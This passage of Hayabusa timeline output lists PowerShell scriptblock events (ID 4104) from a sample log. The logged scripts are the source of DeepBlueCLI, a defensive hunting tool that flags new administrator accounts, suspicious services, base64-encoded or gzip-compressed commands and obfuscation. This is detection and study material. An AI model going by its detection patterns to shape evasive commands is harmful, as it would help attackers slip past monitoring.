$hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:34.470 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:34.470 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:34.470 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:34.470 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:34.474 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent 